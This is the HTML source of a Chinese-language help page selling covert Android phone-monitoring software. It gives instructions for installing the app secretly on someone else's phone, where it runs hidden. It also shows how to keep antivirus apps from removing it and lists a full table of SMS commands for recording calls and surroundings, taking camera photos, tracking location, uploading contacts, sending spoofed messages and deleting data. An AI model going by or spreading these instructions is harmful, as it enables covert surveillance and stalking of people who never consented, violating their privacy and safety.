﻿<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <meta http-equiv="content-language" content="zh-cn" />
    <title>蒙知晓软件|手机监控软件官方网站|安卓超级版</title>
    <meta name="keywords" content="蒙知晓软件,手机监控,QQ微信监控,安卓监控" />
    <meta name="description" content="蒙知晓软件是世界上最强大的一款手机远程监控软件，如果你购买是安卓超级版，在这里可以帮助你使用中常见问题，不明白可以联系在线客服。" />

  <link rel="stylesheet" type="text/css" href="/css/style.css" media="screen" />
<script type="text/javascript" src="/js/jquery1.9.1.js"></script>
<script type="text/javascript">
    document.documentelement.classname="js";
</script>
<script type="text/javascript" src="/js/jquery.js"></script>
<style>
  #small_triangle{left:665px;}
</style>
<script type="text/javascript">
  $(function(){
    $('.et-tabs-container .et-tabs-control li').click(function(){
      $('.et-tabs-container .et-tabs-control li').removeClass("active");
      $(this).addClass("active");
      $('.et-tabs-container .et-tabs-control li').each(function(index){
        var numid = $(this).attr("id");

        $('.tit2_'+(numid*1)+'').hide();
      });
      $('.tit2_'+$(this).attr("id")+'').show();
    });
  })
</script>
</head>
<body>
    <div id="header">
		<div class="container">
			<a href="/"><img id="logo" border="0" src="/images/mzxfd_logo.png" alt="Logo" title="蒙知晓软件" /></a>

			<div id="top-menu">
				<ul id="menu-top-menu" class="superfish nav clearfix">
                                 <li><a href="/">首页</a></li>
				<li><a href="/feature/">软件介绍</a>
				<ul class="sub-menu">
				<li><a href="/feature/">特点功能</a></li>
				<li><a href="/models/">支持机型</a></li>
				</ul>
				</li>
				<li><a href="/downLoad/">软件下载</a>
				<ul class="sub-menu">
				<li><a href="/downLoad/">软件下载</a></li>
				<li><a href="/buy/">软件购买</a></li>
				</ul>
				</li>
				<li><a href="/news/">防盗新闻</a>
				<ul class="sub-menu">
				<li><a href="/news/">行业新闻</a></li>
				<li><a href="/new/">最新消息</a></li>
				<li><a href="/case/">客户案例</a></li>
				<li><a href="/video/">视频新闻</a></li>
				</ul>
				</li>
				<li><a href="/help/">使用帮助</a>
				<ul class="sub-menu">
				<li><a href="/help/android1/">安卓超级版</a></li>
				<li><a href="/help/android/">安卓旗舰版</a></li>
				<li><a href="/help/iphone/">苹果旗舰版</a></li>
				</ul>
				</li>
				<li><a href="/aboutComp/">关于我们</a>
				<ul class="sub-menu">
				<li><a href="/aboutComp/termService.html">服务条款</a></li>
				<li><a href="/aboutComp/disclaimer.html">免责声明</a></li>
				<li><a href="/aboutComp/agent.html">代理加盟</a></li>
				</ul>
				</li>
				</ul>
			</div>
		</div>
  </div>
    <div id="pagetop">
  <div class="container">
    <h1>安卓超级版</h1>
        
  </div>
</div>
<div id="breadcrumbs">
  <div class="container">
                <a href="/">首页</a>&raquo;<a href="/help/android1/">安卓超级版</a>
  </div>
</div>
  <div id="content" class="clearfix">
    <div class="container">
<div id="content-area" class="clearfix fullwidth">
<div class="et-tabs-container">
   <ul class="et-tabs-control">
<li id="1" class="active"><a href="javascript:;">软件安装</a></li>
<li id="2"><a href="javascript:;">远程命令</a></li>
<li id="3"><a href="javascript:;">手机设置</a></li>
<li id="4"><a href="javascript:;">常见问题</a></li></ul>
<div class="et-tabs-content">
                      <div class="tit2_1" style="display:block;">
                          <h2 style="text-align: center"><strong><br>软件安装</strong></h2>
                        <div class="et-box et-info">
                          <div class="et-box-content"><strong>安装蒙知晓软件必须拿到目标手机安装软件，软件安装简单，一分钟以内软件安装完成,软件安装后无界面无任何安装痕迹。</strong></div>
                        </div>
                          
                          <p><strong>一：软件下载</strong></p><p>下载安装软件：在目标手机进入http://d.sj6.cc下载后打开安装》安装后选择打开》打开后点击激活或启动！软件安装完成！</p><p><strong>二：安装详图</strong></p><p><strong>1.打开手机默认浏览器</strong></p><p><img src="/upload/images/2014/9/23112638109.jpg" width="220" height="410" alt="蒙知晓手机监控" /></p><p><strong>2.输入软件下载网址：http://d.sj6.cc </strong><br /></p><p><img src="/upload/images/2014/9/23112639546.jpg" width="220" height="410" alt="蒙知晓手机监控" /></p><p><strong>3.等软件下载完成安装软件</strong><br /></p><p><img src="/upload/images/2014/9/23112640812.jpg" width="220" height="410" title="蒙知晓手机监控" /></p><p><strong>4.点击安装软件</strong><br /></p><p><img src="/upload/images/2014/9/23112641609.jpg" width="220" height="410" alt="蒙知晓手机监控" /></p><p><strong>5.软件安装完成点打开（点打开、点完成安装失败）</strong><br /></p><p><img src="/upload/images/2014/9/2311264278.jpg" width="220" height="410" alt="蒙知晓手机监控" /></p><p><strong>6.打开以后点启动软件</strong><br /></p><p><img src="/upload/images/2014/9/23112642562.jpg" width="220" height="410" alt="蒙知晓手机监控" /></p><p><br /></p><p><strong>三、软件到此完全安装完成可以激活软件和设置软件了、详细见<span style="color:#ff0000;">远程命令</span>。</strong></p>
                          
                        
                        </div>
                        <div class="tit2_2" style="display:none;">
                          
                          <h2 style="text-align:center"><strong><br>远程命令</strong></h2>
                        <div class="et-box et-info">
                          <div class="et-box-content"><strong>用任意可发短信的手机编辑命令发送到目标安装手机注意（*）在非中文下输入</strong></div></div>
 <div class="comparisor">
<table cellspacing="0" cellpadding="20" width="99%" align="center" bgcolor="#ffffff" border="1"> 
<thead> 
<tr> 
<th class="ei">序号</th> 
<th class="ei">功能</th> 
<th class="ei">指令格式</th> 
<th class="ei">备注（鼠标放备注上有完整格式）</th> 
</tr>
</thead> 
<tbody>
  <tr class="odd">
    <td class="ei">01</td>
      <td class="burl">探测指令</td>
      <td class="burl">*#</td>
      <td class="heading"><span class="et-tooltip">探测软件安装是否正常</span></td>
    </tr>
    <tr class="even">
    <td class="ei">02</td>
      <td class="burl">激活软件</td>
      <td class="burl">*激活码*0</td>
      <td class="heading"><span class="et-tooltip"> (激活成功）或 (激活失败)</span></td>
    </tr>
    <tr class="odd">
    <td class="ei">03</td>
      <td class="burl">主控号码设置</td>
      <td class="burl">*激活码*2*主控号码</td>
      <td class="heading"><span class="et-tooltip">主控号码主要接收换卡通知</span></td>
    </tr>
    <tr class="even">
    <td class="ei">04</td>
      <td class="burl">接收邮箱设置</td>
      <td class="burl">*激活码*1*邮箱地址</td>
      <td class="heading"><span class="et-tooltip">建议用QQ或139邮箱</span></td>
    </tr>
    <tr class="odd">
    <td class="ei">05</td>
      <td class="burl">录音功能开关</td>
      <td class="burl">*激活码*3*1或0</td>
      <td class="heading"><span class="et-tooltip">默认录音开启无需设置</span></td>
    </tr>
    <tr class="even">
    <td class="ei">06</td>
      <td class="burl">设置不监控号码</td>
      <td class="burl">*激活码*4*不监控号码或0取消</td>
      <td class="heading"><span class="et-tooltip">不设置默认全部监控</span></td>
    </tr>
    <tr class="odd">
    <td class="ei">07</td>
      <td class="burl">设置监控号码</td>
      <td class="burl">*激活码*5*监控号码或0取消</td>
      <td class="heading"><span class="et-tooltip">不设置默认全部监控</span></td>
    </tr>
    <tr class="even">
    <td class="ei">08</td>
      <td class="burl">设置环境录音</td>
      <td class="burl">*激活码*6*分钟</td>
      <td class="heading"><span class="et-tooltip">（1-20）分钟</span></td>
    </tr>
    <tr class="odd">
    <td class="ei">09</td>
      <td class="burl">实时定位信息</td>
      <td class="burl">*激活码*7</td>
      <td class="heading"><span class="et-tooltip">发指令手机接收位置信息</span></td>
    </tr>
    <tr class="even">
    <td class="ei">10</td>
      <td class="burl">上传电话本</td>
      <td class="burl">*激活码*8</td>
      <td class="heading"><span class="et-tooltip">（上传成功）或（上传失败）</span></td>
    </tr>
    <tr class="odd">
    <td class="ei">11</td>
      <td class="burl">设置上传条目</td>
      <td class="burl">*激活码*9*1</td>
      <td class="heading"><span class="et-tooltip">默认短信3-5条、录音1条上传</span></td>
    </tr>
    <tr class="even">
    <td class="ei">12</td>
      <td class="burl">上传通话记录</td>
      <td class="burl">*激活码*11</td>
      <td class="heading"><span class="et-tooltip">通话记录不带录音</span></td>
    </tr>
    <tr class="odd">
    <td class="ei">13</td>
      <td class="burl">远程开关手机网络</td>
      <td class="burl">*激活码*12*1或0</td>
      <td class="heading"><span class="et-tooltip">（1打开）或（0关闭）</span></td>
    </tr>
    <tr class="even">
    <td class="ei">14</td>
      <td class="burl">远程开关wifi</td>
      <td class="burl">*激活码*12*11或00</td>
      <td class="heading"><span class="et-tooltip">（11打开）或（00关闭）</span></td>
    </tr>
    <tr class="odd">
    <td class="ei">15</td>
      <td class="burl">前置摄像头拍照</td>
      <td class="burl">*激活码*14*0</td>
      <td class="heading"><span class="et-tooltip">部分手机有拍照快门声</span></td>
    </tr>
    <tr class="even">
    <td class="ei">16</td>
      <td class="burl">后置摄像头拍照</td>
      <td class="burl">*激活码*14*1</td>
      <td class="heading"><span class="et-tooltip">部分手机有拍照快门声</span></td>
    </tr>
    <tr class="odd">
    <td class="ei">17</td>
      <td class="burl">录音模式设置</td>
      <td class="burl">*激活码*15*2或3或4</td>
      <td class="heading"><span class="et-tooltip">录音质量或解决只有单边录音</span></td>
    </tr>
    <tr class="even">
    <td class="ei">18</td>
      <td class="burl">虚拟短信设置</td>
      <td class="burl">*激活码*16*接收号码*内容</td>
      <td class="heading"><span class="et-tooltip">虚拟目标号码发送信息</span></td>
    </tr>
    <tr class="odd">
    <td class="ei">19</td>
      <td class="burl">短信屏蔽设置</td>
      <td class="burl">*激活码*13*号码或0取消</td>
      <td class="heading"><span class="et-tooltip">阻止给目标号码发信息</span></td>
    </tr>
    <tr class="even">
    <td class="ei">20</td>
      <td class="burl">拦截来电设置</td>
      <td class="burl">*激活码*17*1或0取消</td>
      <td class="heading"><span class="et-tooltip">阻止给目标号码打电话</span></td>
    </tr>
    <tr class="odd">
    <td class="ei">21</td>
      <td class="burl">删除电话本及通话记录</td>
      <td class="burl">*激活码*009</td>
      <td class="heading"><span class="et-tooltip">谨慎设置（不推荐）</span></td>
    </tr>
    <tr class="even">
    <td class="ei">22</td>
      <td class="burl">监控QQ、微信功能</td>
      <td class="burl">暂不支持</td>
      <td class="heading"><span class="et-tooltip">选择旗舰版</span></td>
    </tr>
    <tr class="odd">
    <td class="ei">23</td>
      <td class="burl">注销激活码</td>
      <td class="burl">拨打：*激活码*118*主控号码</td>
      <td class="heading"><span class="et-tooltip">目标手机拨打（软件正常工作时）</span></td>
    </tr>
</tbody> 
</table>
                        </div>
                        </div>
                        <div class="tit2_3" style="display:none;">
                        
                          <h2 style="text-align: center"><strong><br>手机设置</strong></h2>
                        <div class="et-box et-info">
                          <div class="et-box-content">蒙知晓安卓超级版软件安装完成主要设置是对手机杀毒软件做设置，如：<strong>360手机卫士</strong>、<strong>腾讯管家</strong>、<strong>百度手机卫士</strong>、<strong>金山手机卫士</strong>。</div></div>
                          
                          <p><strong>一、360手机卫士设置</strong></p><p><span style="color:#ff0000;">1.防清理设置</span><strong><br /></strong></p><p><img src="/upload/images/2014/10/16585493.jpg" title="防清理设置" /><br /></p><p><span style="color:#ff0000;">2.隐私监控设置</span></p><p><img src="/upload/images/2014/10/165951265.jpg" title="隐私监控设置" /><br /></p><p><span style="color:#ff0000;">3.自启设置</span></p><p><img src="/upload/images/2014/10/17039953.jpg" title="自启设置" /><br /></p><p><br /></p><p><strong>二、小米手机设置 </strong></p><p><br /></p><p>1.小米手机安装后找到系统与安全进入到授权管理点击中间的程序，把Android Tools设置为信任该程序，然后然为开机自动启动。</p><p>2.桌面“工具”文件夹里面。有个“授权管理”</p><p>3.入短信点击菜单键调出菜单进行设置找到高级设置关闭掉系统短信优先。</p>
                          
                        
                        </div>
                        <div class="tit2_4" style="display:none;">
                        
                          <h1 style="text-align: center"><strong><br>常见问题</strong></h1>
                        <div class="et-box et-info">
                          <div class="et-box-content">如果你遇到了什么问题在这里不能找到，你可以把你的问题提交给我们，我们客服会很快帮助处理一切问题。</div></div>
    <div class="bellows">
      <div class="bellows__item">
        <div class="bellows__header">
          <h3>（1）问：这种软件效果怎么样？</h3>
        </div>
        <div class="bellows__content">
          <p>答：既然我们把软件能提供免费试用后再购买，证明我们软件质量是过硬的，各项功能是完美的，目前很多客户都在使用我们软件，请您放心购买。</p>
        </div>
      </div>
      <div class="bellows__item">
        <div class="bellows__header">
          <h3>（2）问：安卓超级版软件大概多少钱？</h3>
        </div>
        <div class="bellows__content">
          <p>答：安卓超级版购买一年是2000元，购买永久是3000元。</p>
        </div>
      </div>
      <div class="bellows__item">
        <div class="bellows__header">
          <h3>（3）问：安卓超级版和安卓旗舰版软件有什么区别？</h3>
        </div>
        <div class="bellows__content">
          <p>答：安卓超级版之前销售量和功能都是最好的，2014年Google对安卓系统进行升级到4.2以后发短信命令对方手机会收到。</p>
          <p>答：安卓旗舰版是根据现有问题和客户反馈开发的，在功能（支持QQ、微信监控）和兼容性（短信命令调整）上进行了完善。</p>
        </div>
      </div>
      <div class="bellows__item">
        <div class="bellows__header">
          <h3>（4）问：安装软件时对SIM卡有什么要求，会扣话费吗？</h3>
        </div>
        <div class="bellows__content">
          <p>答：这不是扣费软件，要求手机卡开通上网功能（手机卡默认开通此功能），不管是移动、联通还是电信的手机卡都可以，推荐开通GPRS流量包月（一般5元上网流量包月套餐足够），详询10086/10010/10000。</p>
        </div>
      </div>
      <div class="bellows__item">
        <div class="bellows__header">
          <h3>（5）问：安装蒙知晓软件时，是不是必须要求开通GPRS？</h3>
        </div>
        <div class="bellows__content">
          <p>答：是的，因为所有通话录音和短信内容上传邮箱是通过GPRS，被控手机一定要开通流量包月。5块钱30M的包月就足够了。</p>
        </div>
      </div>
      <div class="bellows__item">
        <div class="bellows__header">
          <h3>（6）问：手机已安装了蒙知晓软件，使用前是否需要激活？如何激活？</h3>
        </div>
        <div class="bellows__content">
          <p>答：蒙知晓软件安装后需要激活才可以使用所有功能，方法是用主控手机发送短信指令给被控手机，待回复激活成功的短信后就可以了。</p>
        </div>
      </div>
      <div class="bellows__item">
        <div class="bellows__header">
          <h3>（7）问：安装有蒙知晓软件的手机可以正常使用吗？</h3>
        </div>
        <div class="bellows__content">
          <p>答：可以正常使用，软件程序是隐蔽运行的，不会影响手机的正常使用。可以正常接打电话，收发短信。手机所有功能和原来一样。</p>
        </div>
      </div>
      <div class="bellows__item">
        <div class="bellows__header">
          <h3>（8）问：主控手机发送的短信指令，被控手机会收到吗？</h3>
        </div>
        <div class="bellows__content">
          <p>答：安卓4.2以下系统在软件作用下，被控手机是不会收到短信指令的。</p>
        </div>
      </div>
      <div class="bellows__item">
        <div class="bellows__header">
          <h3>（9）问：蒙知晓软件同时可以安装几部手机？</h3>
        </div>
        <div class="bellows__content">
          <p>答：每套软件都有唯一的激活码，一个激活码只能激活一部手机上的软件，如果想安装两个手机，就需要2个激活码。没有所谓多用户版的说法，网上那是骗人的，没那么先进的软件。</p>
        </div>
      </div>
      <div class="bellows__item">
        <div class="bellows__header">
          <h3>（10）问：安装有蒙知晓软件的手机使用中的数据安全吗?</h3>
        </div>
        <div class="bellows__content">
          <p>答：最初的后台版必须登录到代理商的服务器上才可以看到所有通话信息，很不安全，新版软件是直接将被控手机的所有信息通过GPRS直接上传到你个人邮箱，只有你自己可以查看到。</p>
        </div>
      </div>
      <div class="bellows__item">
        <div class="bellows__header">
          <h3>（11）问：购买后，还需要支付别的费用吗？</h3>
        </div>
        <div class="bellows__content">
          <p>答：不需要，免费提供更新服务。</p>
        </div>
      </div>
      <div class="bellows__item">
        <div class="bellows__header">
          <h3>（12）问：如何安装蒙知晓软件？</h3>
        </div>
        <div class="bellows__content">
          <p>答：拿到对方手机，打开网络，输入网址，软件会自动下载，选择打开安装，提示安装完成后把手机还给对方，剩下的操作和设置就不用再接触对方手机了。</p>
        </div>
      </div>
      <div class="bellows__item">
        <div class="bellows__header">
          <h3>（13）问：安装后手机换卡怎么办？</h3>
        </div>
        <div class="bellows__content">
          <p>答：只要安装了软件，手机换SIM卡不受任何影响，同时你的主控手机号会收到换通知。</p>
        </div>
      </div>
      <div class="bellows__item">
        <div class="bellows__header">
          <h3>（14）问：如何购买交易？</h3>
        </div>
        <div class="bellows__content">
          <p>答：我们支持支付宝担保交易提供先安装测试，所有功能满意后再付款。</p>
        </div>
      </div>
      <div class="bellows__item">
        <div class="bellows__header">
          <h3>（15）问：我付款后，你们会再注销吗？</h3>
        </div>
        <div class="bellows__content">
          <p>答：我们不是刚刚才做这个的，毕竟也做了这么久软件也一直没有出什么问题。我们软件是真实的，有着非常好的市场，难道为了这两三千块钱而放弃整个市场吗？</p>
        </div>
      </div>
      <div class="bellows__item">
        <div class="bellows__header">
          <h3>（16）问：蒙知晓软件是如何实现通话监听的？</h3>
        </div>
        <div class="bellows__content">
          <p>答：对方手机安装软件后，每次接打电话，在软件作用下会自动录音并通过GPRS网络将录音文件上传到你自己的邮箱，手机里不会留下录音文件。上传的录音文件是最小的amr格式，占用流量很小，只要开通5块钱30M流量包月就足够了，上传过程是隐蔽运行的。</p>
        </div>
      </div>
      <div class="bellows__item">
        <div class="bellows__header">
          <h3>（17）问：如何更换手机安装？</h3>
        </div>
        <div class="bellows__content">
          <p>答：如果您想安装在另外一部手机上，必须先将之前安装的软件注销！注销过程只需几秒钟。</p>
        </div>
      </div>
      <div class="bellows__item">
        <div class="bellows__header">
          <h3>（18）问：可以发彩信安装吗？</h3>
        </div>
        <div class="bellows__content">
          <p>答：蒙知晓软件不可能通过发彩信的方式安装。任何手机软件都是有写保护功能的，蓝牙和彩信无法传输，你听过哪个普通的手机软件可以彩信安装？彩信发送的内存只有50KB，而“蒙知晓软件”有200多KB内存，如何将200多KB内存的软件通过彩信发送到对方手机？</p>
        </div>
      </div>
      <div class="bellows__item">
        <div class="bellows__header">
          <h3>（19）问：使用蒙知晓软件是否违法？</h3>
        </div>
        <div class="bellows__content">
          <p>答：自从蒙知晓软件出现在国内市场后，由于它特殊的功能引起了社会各界的关注很多人在惊奇的同时也会疑惑使用这款手机软件到底违不违法呢？这种软件最初用于手机防盗、信息备份管理、监督和保护您的孩子。如果你使用它去窃取他人的隐私资料以达到自己的目的，就属于违法行为，触犯了国家刑法。</p>
        </div>
      </div>
      <div class="bellows__item">
        <div class="bellows__header">
          <h3>（20）问：蒙知晓软件是病毒或木马吗？</h3>
        </div>
        <div class="bellows__content">
          <p>答：手机病毒或木马是可以自行安装、感染的，而且安装过程中没有任何安装提示，它的一个重要特征就是可以自动传播。蒙知晓软件不是病毒或木马，只是一个手机软件，必须手动安装，安装过程只需要2分钟，而且在安装过程中，软件会提示您是否同意安装，安装成功之后所有的功能也要人为的设置才能生效。</p>
        </div>
      </div>
      <div class="bellows__item">
        <div class="bellows__header">
          <h3>（21）问：央视报道的X卧底是真的吗？</h3>
        </div>
        <div class="bellows__content">
          <p>答：自从中央电视台新闻频道东方时空节目报道了有关X卧底软件对人们生活隐私的影响之后，全国各地的电视台、报纸、网络媒体也都纷纷的转载此期东方时空的相关报道。但是报道有很多不实之处，造成很多人上当受骗！</p>
        </div>
      </div>
      <div class="bellows__item">
        <div class="bellows__header">
          <h3>（22）问：最初的X卧底是南京特洛伊公司的吗？</h3>
        </div>
        <div class="bellows__content">
          <p>答：X卧底（即后台版），原名Flexispy，是南京特洛伊公司在2006年初从泰国引进的，经过破解、升级和汉化之后，在国内建立了独立的服务器进销售，同时把flexispy改名为x卧底软件。后来由于他们公司销售方式不当，被媒体曝光，导致在2007年底被国家安全总局查封，服务器也被没收。从此之后南京特洛伊公司的x卧底窃听软件和服务器也就不存在了。</p>
        </div>
      </div>
      <div class="bellows__item">
        <div class="bellows__header">
          <h3>（23）问：真正的官网是哪个？</h3>
        </div>
        <div class="bellows__content">
          <p>答：网上所谓的“官网”很多，而且假的比真的还要多，每个代理商都会建立属于自己的“官网”，几百块就可以建个网站，而且网站的模式和内容都差不多。购买这种软件不一定非要在官网购买，全国都是统一的市场价，只要是正规代理商，价格都差不多的，如果某个网站介绍的价格很低，那肯定不是正规代理或他们卖的肯定是老版本。</p>
        </div>
      </div>
      </div>
                        </div>
                </div>
                <div class="clear"></div>
             </div>
        </div>
    </div>
</div>
<div id="footer">
    <div class="container clearfix">
      <div id="nav_menu-4" class="widget widget_nav_menu">
      <h3 class="widgettitle">底部导航</h3>
            <div class="menu-footer-menu-container">
            <ul id="menu-footer-menu" class="menu">
      <li><a href="/">首页</a></li>
      <li><a href="/aboutComp/agent.html">加盟代理</a></li>
      <li><a href="/aboutComp/termService.html">使用条款</a></li>
      <li><a href="/aboutComp/disclaimer.html">免责声明</a></li>
      <li><a href="/feature/index.html">功能特点</a></li>
      <li><a class="WhiteLink" href="/sitemap.html" target="_blank">网站地图</a></li>
            </ul>
      </div>
    </div>
      <div id="transposh-2" class="widget widget_transposh">
      <h3 class="widgettitle">友情链接</h3>
                 <div class="no_translate transposh_flags" >
                                     <a href="#" target="_blank">手机监控软件</a> | <a href="http://www.0460.com/baike/">0460网站百科</a><br />
                                     <a href="http://www.kldhw.com/">快乐导航网</a> | <a href="http://www.hahatxt.com/">哈哈网址大全</a><br />
                                     <a href="http://www.szjmgc.com/">天空导航</a> | <a href="http://www.ruyiwangzhi.com/">如意网址</a><br />
                                     <a href="http://ranked1000.com/">友情链接</a> | <a href="#" target="_blank">手机防盗监控</a><br />
                                     <a href="http://www.l9y7.com/">好网址</a> | <a href="http://www.rediandaohang.com/">热点导航</a><br />
                 </div>
                 </div>
      <div id="text-2" class="widget widget_text">
      <h3 class="widgettitle">联系我们</h3>
        <div class="textwidget">
        蒙知晓手机防盗监控软件开发团队<br />
        中国 华南地区 香港特别行政区尖沙咀广东道753号<br />
        电话:13838384388<br />
        QQ:2488349936<br />
        E-mail:2488349936@qq.com<br />
        </div>
      </div>
      </div>
</div>
<div id="copyright">
    <div class="container clearfix">
        <img class="copyplimus" alt="蒙知晓软件" src="/images/cards_type2_1-2.gif" />
                 <p id="copyinfo">蒙知晓手机防盗监控软件开发团队 2002-2014<br /></p>
    </div>
</div>
<script type="text/javascript" src="/js/mzx.js"></script>
<script type="text/javascript" src="/js/jquery-1.7.2.min.js"></script>
  <script type="text/javascript" src="/js/jquery-1.10.1.min.js"></script>
    <script>
      $(function(){
      $('.bellows').bellows();
       });
    </script>
<div style="text-align:center;margin:0 0">
  <!--浮动面板-->
  <div id="floatPanel">
    <div class="ctrolPanel">
      <a class="arrow" href="#"><span>顶部</span></a>
      <a class="contact" href="http://www.maxtaobao.cn/" target="_blank"><span>任务</span></a>
      <a class="qrcode" href="#"><span>微信二维码</span></a>
      <a class="arrow" href="#"><span>底部</span></a>
    </div>
    <div class="popPanel">
      <div class="popPanel-inner">
        <div class="qrcodePanel">
          <img src="/images/weixin.jpg" alt="蒙知晓软件" /><span>扫描二维码关注我为好友</span>
        </div>
        <div class="arrowPanel">
          <div class="arrow01">
          </div>
          <div class="arrow02">
          </div>
        </div>
      </div>
    </div>
  </div> </div>
  </body>
</html>
<script src="/sitefiles/services/cms/PageService.aspx?type=AddCountHits&publishmentSystemID=1&channelID=22&contentID=32" type="text/javascript"></script>